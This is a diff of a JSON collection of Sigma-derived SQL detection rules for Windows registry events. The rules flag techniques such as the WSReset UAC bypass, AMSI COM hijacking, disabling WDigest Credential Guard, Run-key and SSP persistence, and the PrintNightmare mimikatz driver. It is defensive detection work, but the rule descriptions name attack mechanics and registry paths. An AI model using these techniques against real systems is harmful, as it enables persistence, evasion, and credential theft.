"status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detects persistence registry keys for Recycle Bin", 
"author": "frack113", "tags": [ "attack.persistence", - "attack.t1137.006" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ "attack.defense_evasion", - "attack.t1070.005" + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND 
Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + ], + "filename": "registry_event_apt_oceanlotus_registry.yml" + }, + { + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", + "tags": [ + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + ], + "filename": 
"registry_event_mal_flowcloud.yml" + }, + { + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", + "tags": [ + "attack.persistence", + "attack.t1137.002" + ], + "falsepositives": [ + "Unlikely" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + 
"attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - 
"attack.defense_evasion", - "attack.t1564.001" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime 
scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may 
abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": 
"Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible 
persistence using Fax DLL load when service restart", - "author": "frack113", + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + 
"status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - 
"description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE 
'%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "status": "test", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.009" ], "falsepositives": [ - "Legitimate admin or third party scripts. 
